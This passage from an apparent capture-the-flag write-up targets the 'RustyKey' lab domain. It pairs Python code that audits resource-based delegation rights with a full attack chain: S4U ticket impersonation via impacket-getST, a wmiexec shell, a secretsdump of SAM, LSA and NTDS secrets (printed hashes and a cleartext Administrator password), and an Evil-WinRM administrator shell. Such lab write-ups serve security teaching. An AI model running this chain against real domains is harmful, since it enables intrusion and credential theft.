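FULL_CONTROL_MASK = 0x000F01FF      # CCDCLCSWRPWPDTLOCRSDRCWDWO; assumed mask written by RBCD tooling

# Constructed placeholder domain SID; the real rustykey.htb domain SID is not on the page.
EXAMPLE_DOMAIN_SID = (21, 1111111111, 2222222222, 3333333333)


def build_sid(*subauths, authority=5):
    """Encode S-1-<authority>-<subauths...> in its binary form."""
    return (struct.pack("<BB", 1, len(subauths))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subauths))


def sid_to_str(data, offset=0):
    """Decode a binary SID at `offset`, returning (string form, encoded length)."""
    revision, count = data[offset], data[offset + 1]
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs))), 8 + 4 * count


def build_rbcd_descriptor(principals, mask=FULL_CONTROL_MASK):
    """Self-relative SD: 20-byte header, owner SID, then a DACL with one allow ACE per principal."""
    owner = build_sid(32, 544)                                   # BUILTIN\Administrators
    sids = [build_sid(*p) for p in principals]
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), mask) + s
                    for s in sids)
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))               # owner, group, sacl, dacl offsets
    return header + owner + dacl


def parse_rbcd_descriptor(sd):
    """Return [(sid, mask)] for each allow ACE; an empty attribute means nobody may delegate."""
    if not sd:
        return []
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_to_str(sd, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size                      # ACE sizes are self-describing, so unknown types are skipped
    return allowed


def audit_rbcd(sd, approved):
    """SIDs allowed to act on behalf of other identities that are not on the approved list."""
    return [sid for sid, _ in parse_rbcd_descriptor(sd) if sid not in approved]


if __name__ == "__main__":
    sd = build_rbcd_descriptor([EXAMPLE_DOMAIN_SID + (1125,)])
    print(audit_rbcd(sd, approved=set()))
```

In a live check the attribute is read over LDAP as its raw security descriptor bytes and handed to `parse_rbcd_descriptor`; on a domain controller the expected result is an empty list, and `Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount $null` clears anything that should not be there. With Directory Service Changes auditing enabled, the write itself is recorded as event 5136 naming the attribute, which is the point at which this step of the chain is visible.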

The target is BACKUPADMIN:

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/IT-COMPUTER3\$.ccache 

[root@kali] /home/kali/RustyKey  
❯ impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

A service ticket for backupadmin has now been obtained through Kerberos delegation (S4U); think of it as temporarily borrowing that account's privileges. Next, get a shell via wmiexec:

[root@kali] /home/kali/RustyKey  
❯ impacket-wmiexec -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
rustykey\backupadmin

C:\>

DCsync

The Administrator hash can now be dumped:

[root@kali] /home/kali/RustyKey  
❯ impacket-secretsdump -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword 
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM 
 0000   6A 34 14 2E FC 1A C2 54  64 E3 4C F1 A7 13 5F 34   j4.....Td.L..._4
 0010   79 98 16 81 90 47 A1 F0  8B FC 47 78 8C 7B 76 B6   y....G....Gx.{v.
 0020   C0 E4 94 9D 1E 15 A6 A9  70 2C 13 66 D7 23 A1 0B   ........p,.f.#..
 0030   F1 11 79 34 C1 8F 00 15  7B DF 6F C7 C3 B4 FC FE   ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<hidden>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:44c72edbf1d64dc2ec4d6d8bc24160fc:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:4dee0d4ff7717c630559e3c3c3025bbf:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
mark_pentester:12104:aad3b435b51404eeaad3b435b51404ee:b17ebf419e79699e47addeeff82aa886:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::

Then, as before, a ticket has to be requested for authentication:

[root@kali] /home/kali/RustyKey  
❯ impacket-getTGT rustykey.htb/'Administrator' -hashes ":<hidden>"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator.ccache

[root@kali] /home/kali/RustyKey  
❯ export KRB5CCNAME=/home/kali/RustyKey/Administrator.ccache                                

[root@kali] /home/kali/RustyKey  
❯ evil-winrm -i dc.rustykey.htb -u 'Administrator' -r rustykey.htb                      
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rustykey\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 
